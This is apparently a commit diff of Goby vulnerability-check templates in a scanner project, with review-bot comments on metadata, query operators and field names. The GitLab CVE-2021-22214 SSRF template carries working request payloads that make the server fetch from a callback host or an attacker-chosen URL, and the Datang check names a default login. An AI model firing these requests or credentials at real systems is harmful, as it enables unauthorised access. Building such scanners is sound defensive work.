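+++ b/lib/goby/goby_pocs/ClickHouse_SQLI.json
@@ -4,17 +4,17 @@
  "Tags": [
  "sqli"
  ],
- "GobyQuery": "banner=\"X-Clickhouse-Summary\" || port=\"8123\"",
- "Description": "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real-time.",
+ "GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")",
+ "Description": "ClickHouse 存在着的接口由于没有鉴权,则任意访问者都可以执行SQL语句获取数据.",
  "Product": "ClickHouse",
- "Homepage": "https://clickhouse.com/",
- "Author": "",
- "Impact": "Clickhouse has unauthorized access and can perform SQL statements to get data.",
+ "Homepage": "https://gobies.org/",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -98,43 +98,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-12-04 18:32:14",
+ "GobyVersion": "1.9.310"
 }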
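Review bot: `GobyQuery` still ORs in a bare `port=\"8123\"`, so the template is selected for any service listening on that port, not only hosts that returned the `X-Clickhouse-Summary` banner. Since the commit already rewrites this line, narrowing it to the banner match would cut false positives and unnecessary probes: `"GobyQuery": "banner=\"X-Clickhouse-Summary\""`. `Impact` is emptied and the English `Description` is replaced with Chinese text, so English-language reports lose their only impact statement; I would keep the old `Impact` sentence. `Homepage` moves from the vendor site to `https://gobies.org/`, which looks unintended.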
  • lib/goby/goby_pocs/ClusterEngineV4.0_RCE_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/ClusterEngine_V4.0_Shell_cluster_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Coldfusion_LFI_CVE_2010_2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Confluence_RCE_CVE_2021_26084.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
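--- a/lib/goby/goby_pocs/Consul_Rexec_RCE.json
+++ b/lib/goby/goby_pocs/Consul_Rexec_RCE.json
@@ -5,16 +5,16 @@
  "rce"
  ],
  "GobyQuery": "protocol=\"consul(http)\"",
- "Description": "Consul is the control plane of the service mesh. Consul is a multi-networking tool that offers a fully-featured service mesh solution that solves the networking and security challenges of operating microservices and cloud infrastructure.",
+ "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request",
  "Product": "Consul",
  "Homepage": "https://www.consul.io/",
- "Author": "",
- "Impact": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://www.exploit-db.com/exploits/46073"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -57,43 +57,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-08 21:46:25",
+ "GobyVersion": "1.8.302"
 }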
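Review bot: The new side leaves `"Impact": ""` next to an already empty `"Recommendation": ""` (lines 12–13), so a finding from this check reaches the report with no consequence or remediation text. The same emptied `Impact` appears in the Datang, DedeCMS, three Discuz, Docker Registry, Fastmeeting, FineReport and GitLab sections, and most of those also replace the English wording with Chinese only. I would keep the removed sentence in `Impact` and fill the remediation, for example `"Recommendation": "Keep disable_remote_exec at its default (true) and require ACL tokens on the agent HTTP API."`; the page only shows the exploit-db reference, so confirm that option matches what this check detects. Setting `HasExp` to false together with dropping the placeholder `/test.php` exploit step is consistent.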
  • lib/goby/goby_pocs/Coremail_Config_Disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Coremail_configuration_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/CouchCMS_Infoleak_CVE-2018-7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Couch_CMS_Infoleak_CVE_2018_7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Couchdb_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/CraftCMS_SEOmatic_Server-Side_Template_Injection_CVE-2020-9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/CraftCMS_Seomatic_RCE_CVE_2020_9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
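--- a/lib/goby/goby_pocs/Datang_AC_Default_Password.json
+++ b/lib/goby/goby_pocs/Datang_AC_Default_Password.json
@@ -4,12 +4,12 @@
  "Tags": [
  "defaultaccount"
  ],
- "GobyQuery": "app=\"大唐电信AC集中管理平台\" || title=\"大唐电信AC集中管理平台\"",
- "Description": "",
- "Product": "Datang Telecom AC centralized management platform",
+ "GobyQuery": "(app=\"大唐电信AC集中管理平台\" | title=\"大唐电信AC集中管理平台\")",
+ "Description": "ACadmin/123456",
+ "Product": "大唐电信AC集中管理平台",
  "Homepage": "http://www.datang.com/",
- "Author": "",
- "Impact": "Datang AC centralized management platform default password admin/123456",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [],
  "HasExp": true,
@@ -99,6 +99,6 @@
  ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-12 19:44:34",
+ "GobyVersion": "1.8.302"
 }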
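Review bot: The `GobyQuery` operator changes from `||` to a single `|` at line 7, and the three Discuz files make the same change. Whether scan4all's query matcher accepts `|` as OR is not visible on this page; if it does not, these checks would silently stop selecting their targets, so either confirm it with a fixture or keep `app=\"…\" || title=\"…\"`. Separately, `"Description": "ACadmin/123456"` on line 8 reads like a sentence that lost its non-ASCII text. The removed wording `Datang AC centralized management platform default password admin/123456` is clearer, and `Recommendation` should tell the operator to change the default password.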
  • ■ ■ ■ ■ ■
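--- a/lib/goby/goby_pocs/DedeCMS_Carbuyaction_FileInclude.json
+++ b/lib/goby/goby_pocs/DedeCMS_Carbuyaction_FileInclude.json
@@ -5,16 +5,16 @@
  "FileInclude"
  ],
  "GobyQuery": "app=\"DedeCMS\"",
- "Description": "Dream Weaving (DedeCMS) Official Website- Content Management System- Shanghai Zhuozhuo Network Technology Co., Ltd.",
+ "Description": "DedeCMS Carbuyaction.php页面存在本地文件包含漏洞",
  "Product": "DedeCMS",
  "Homepage": "http://www.dedecms.com/",
- "Author": "",
- "Impact": "DedeCMS Carbuyaction.php has a local file inclusion vulnerability.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://www.cnblogs.com/milantgh/p/3615986.html"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -88,43 +88,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-13 14:18:50",
+ "GobyVersion": "1.8.302"
 }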
  • lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE-2018-6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE_2018_6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Discuz!ML_3.x_RCE_CNVD-2019-22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Discuz_ML_3.x_RCE__CNVD_2019_22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
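--- a/lib/goby/goby_pocs/Discuz_RCE_WOOYUN_2010_080723.json
+++ b/lib/goby/goby_pocs/Discuz_RCE_WOOYUN_2010_080723.json
@@ -4,17 +4,17 @@
  "Tags": [
  "rce"
  ],
- "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
- "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
- "Product": "Discuz!",
+ "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
+ "Description": "由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。",
+ "Product": "discuz",
  "Homepage": "https://www.discuz.net/",
- "Author": "",
- "Impact": "Since the default value of request_order in the php.ini setting in php5.3.x version is GP, $_COOKIE is no longer included in $_REQUEST. We overwrite the global variable by passing in $GLOBALS in the cookie, resulting in a code execution vulnerability.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -66,43 +66,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-17 13:57:54",
+ "GobyVersion": "1.8.302"
 }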
  • ■ ■ ■ ■ ■
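--- a/lib/goby/goby_pocs/Discuz_Wechat_Plugins_Unauth.json
+++ b/lib/goby/goby_pocs/Discuz_Wechat_Plugins_Unauth.json
@@ -4,17 +4,17 @@
  "Tags": [
  "unauth"
  ],
- "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
- "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
- "Product": "Discuz!",
+ "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
+ "Description": "由Discuz论坛官方微信登录插件产生,攻击者可以利用该插件的漏洞绕过论坛的邮箱、手机号等各种验证非法创建论坛账号,通过该漏洞创建的论坛账号具备一般用户的所有权限,可以任意发帖回帖.",
+ "Product": "discuz",
  "Homepage": "https://www.discuz.net/",
- "Author": "",
- "Impact": "Generated by the official WeChat login plug-in of Discuz Forum, attackers can use the vulnerability of this plug-in to bypass the forum's mailbox, mobile phone number and other verifications to illegally create a forum account. The forum account created through this vulnerability has all the permissions of ordinary users and can be arbitrarily Post a reply.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -78,43 +78,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-17 13:52:51",
+ "GobyVersion": "1.8.302"
 }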
  • ■ ■ ■ ■ ■
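--- a/lib/goby/goby_pocs/Discuz_v72_SQLI.json
+++ b/lib/goby/goby_pocs/Discuz_v72_SQLI.json
@@ -4,17 +4,17 @@
  "Tags": [
  "sqli"
  ],
- "GobyQuery": "app=\"Discuz\" || body=\"Powered by Discuz!\"",
- "Description": "Discuz! is Internet forum software written in PHP and developed by Comsenz Technology Co., Ltd. It supports MySQL and PostgreSQL databases.",
- "Product": "Discuz!",
+ "GobyQuery": "(app=\"Discuz\" | body=\"Powered by Discuz!\")",
+ "Description": "discuz7.2论坛存在sql注入漏洞",
+ "Product": "Discuz",
  "Homepage": "https://www.discuz.net/",
- "Author": "",
- "Impact": "Discuz7.2 has sql injection vulnerability.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://blog.csdn.net/weixin_40709439/article/details/82780606"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -64,43 +64,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-16 17:48:16",
+ "GobyVersion": "1.8.302"
 }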
  • lib/goby/goby_pocs/DocCMS_keyword_SQL_injection_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
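--- a/lib/goby/goby_pocs/Docker_Registry_API_Unauth.json
+++ b/lib/goby/goby_pocs/Docker_Registry_API_Unauth.json
@@ -1,20 +1,20 @@
 {
  "Name": "Docker Registry API Unauth",
- "Level": "1",
+ "Level": "2",
  "Tags": [
  "unauth"
  ],
  "GobyQuery": "header=\"registry/2.0\"",
- "Description": "Docker is a set of platform as a service products that use OS-level virtualization to deliver software in packages called containers.",
+ "Description": "Docker Registry API 存在未授权访问漏洞,黑客可通过API下载docker images,导致敏感信息泄露。",
  "Product": "Docker Registry",
  "Homepage": "https://docs.docker.com/registry/",
- "Author": "",
- "Impact": "There is an unauthorized access vulnerability in the Docker Registry API. Docker images can be downloaded through the API, resulting in the disclosure of sensitive information.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://www.freeaihub.com/post/6085.html"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -98,43 +98,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-27 14:21:33",
+ "GobyVersion": "1.9.310"
 }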
  • lib/goby/goby_pocs/DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Eyou_Mail_System_RCE_CNVD_2021_26422.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Eyou_Mail_system_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/F5_BIG_IP_RCE_CVE_2021_22986_exp.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_API_auth_bypass_CVE_2022_1388.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_Unauthenticated_RCE_CVE_2021_22986.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
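--- a/lib/goby/goby_pocs/Fastmeeting_Arbitrary_File_Read.json
+++ b/lib/goby/goby_pocs/Fastmeeting_Arbitrary_File_Read.json
@@ -1,15 +1,15 @@
 {
- "Name": "Fastmeeting Arbitrary File Read",
+ "Name": "好视通云会议存在任意文件读取漏洞",
  "Level": "2",
  "Tags": [
  "fileread"
  ],
  "GobyQuery": "body=\"深圳银澎云计算有限公司\"",
- "Description": "hst",
- "Product": "hst",
+ "Description": "",
+ "Product": "",
  "Homepage": "https://www.hst.com/",
- "Author": "",
- "Impact": "Fastmeeting Arbitrary File Read",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://mp.weixin.qq.com/s/fMNE1PF5n81O1BpoDRlYkA"
@@ -100,6 +100,6 @@
  ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-12-11 14:50:39",
+ "GobyVersion": "1.9.310"
 }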
  • lib/goby/goby_pocs/FineReport_Directory_traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/FineReport_v8.0_Arbitrary_file_read_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/FineReport_v8.0_Fileread_CNVD_2018_04757.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/FineReport_v8.0_v9.0_Directory_Traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
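--- a/lib/goby/goby_pocs/FineReport_v9_Arbitrary_File_Overwrite.json
+++ b/lib/goby/goby_pocs/FineReport_v9_Arbitrary_File_Overwrite.json
@@ -5,16 +5,16 @@
  "overwrite"
  ],
  "GobyQuery": "app=\"fanruansem-FineReport\"",
- "Description": "FineReport is an web reporting tool.",
- "Product": "fanruan-FineReport",
+ "Description": "由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限",
+ "Product": "-FineReport",
  "Homepage": "https://www.fanruan.com/",
- "Author": "",
- "Impact": "Since there is no restriction on the incoming parameters when initializing the svg file, data can be overwritten to the existing file, so that the server permission can be obtained by writing the Trojan into the jsp file.",
+ "Author": "aetkrad",
+ "Impact": "",
  "Recommendation": "",
  "References": [
  "https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py"
  ],
- "HasExp": true,
+ "HasExp": false,
  "ExpParams": null,
  "ExpTips": {
  "Type": "",
@@ -88,43 +88,6 @@
  ]
  }
  ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/test.php",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "test",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-12-08 11:22:44",
+ "GobyVersion": "1.9.310"
 }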
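Review bot: `"Product": "-FineReport"` on new line 9 starts with a bare hyphen, which looks like a vendor prefix that was lost in an encoding or copy step. Reports and asset grouping keyed on `Product` would then show a malformed name, so I would keep the removed value `"Product": "fanruan-FineReport"`, which also lines up with the `fanruansem-FineReport` app name in `GobyQuery`.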
  • lib/goby/goby_pocs/Finetree_5MP_Network_Camera_Default_Login_unauthorized_user_add.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Finetree_5MP_default_password_or_Unauthorized_user_added.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure_CVE_2020_26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/GitLab_RCE_CVE-2021-22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
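--- a/lib/goby/goby_pocs/GitLab_SSRF_CVE_2021_22214.json
+++ b/lib/goby/goby_pocs/GitLab_SSRF_CVE_2021_22214.json
@@ -1,35 +1,26 @@
 {
  "Name": "GitLab SSRF CVE-2021-22214",
  "Level": "3",
- "Tags": [
- "SSRF"
- ],
+ "Tags": [],
  "GobyQuery": "app=\"GitLab\"",
- "Description": "GitLab is The DevOps Platform.",
- "Product": "GitLab",
- "Homepage": "https://about.gitlab.com/",
- "Author": "",
- "Impact": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.",
- "Recommendation": "",
+ "Description": "GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。",
+ "Product": "Gitlab > 10.5",
+ "Homepage": "https://gobies.org/",
+ "Author": "luckying",
+ "Impact": "",
+ "Recommandation": "",
  "References": [
- "https://nvd.nist.gov/vuln/detail/CVE-2021-22214",
- "https://nvd.nist.gov/vuln/detail/CVE-2021-39935",
- "https://nvd.nist.gov/vuln/detail/CVE-2021-22175",
- "https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html",
- "https://docs.gitlab.com/ee/api/lint.html"
- ],
- "HasExp": true,
- "ExpParams": [
- {
- "Name": "URL",
- "Type": "input",
- "Value": "test.dnslog.cn"
- }
+ "https://gobies.org/"
  ],
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "URL",
+ "type": "input",
+ "value": "test.dnslog.cn",
+ "show": ""
+ }
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -39,7 +30,8 @@
  "follow_redirect": false,
  "header": {
  "Content-Type": "application/json",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "Content-Length": ""
  },
  "data_type": "text",
  "data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
@@ -65,45 +57,9 @@
  ]
  },
  "SetVariable": []
- },
- {
- "Request": {
- "method": "POST",
- "uri": "/api/v4/ci/lint?include_merged_yaml=true",
- "follow_redirect": true,
- "header": {
- "Content-Type": "application/json"
- },
- "data_type": "text",
- "data": "{\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "does not have valid YAML syntax",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
  }
  ],
- "ExploitSteps": [
+ "ExploitSteps": [
  "AND",
  {
  "Request": {
@@ -112,7 +68,8 @@
  "follow_redirect": false,
  "header": {
  "Content-Type": "application/json",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "Content-Length": ""
  },
  "data_type": "text",
  "data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
@@ -138,10 +95,10 @@
  ]
  },
  "SetVariable": [
- "output|lastbody|undefined|undefined"
- ]
+ "output|lastbody"
+ ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-07-01 20:34:22",
+ "GobyVersion": "1.8.268"
 }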
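Review bot: The key on new line 11 is renamed to `"Recommandation"` (the H3C_IMC section does the same), while the other files in this commit spell it `Recommendation`, so a loader that reads the usual key will treat the field as absent; keep `"Recommendation": ""`. The added `"Content-Length": ""` header on new lines 34 and 72 is also risky: if the engine forwards it verbatim on a POST that carries a body, a server or proxy may reject the request and the check turns into a false negative, so I would drop the header and let the HTTP client compute it. The change also empties `Tags`, removes `ExpTips`, and replaces the NVD and GitLab documentation references with `https://gobies.org/`, which removes the CVE traceability a triager relies on. `ExpParams` keys move from `Name`/`Type`/`Value` to lower case; that is only safe if the consumer matches keys case-insensitively, which this page does not show.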
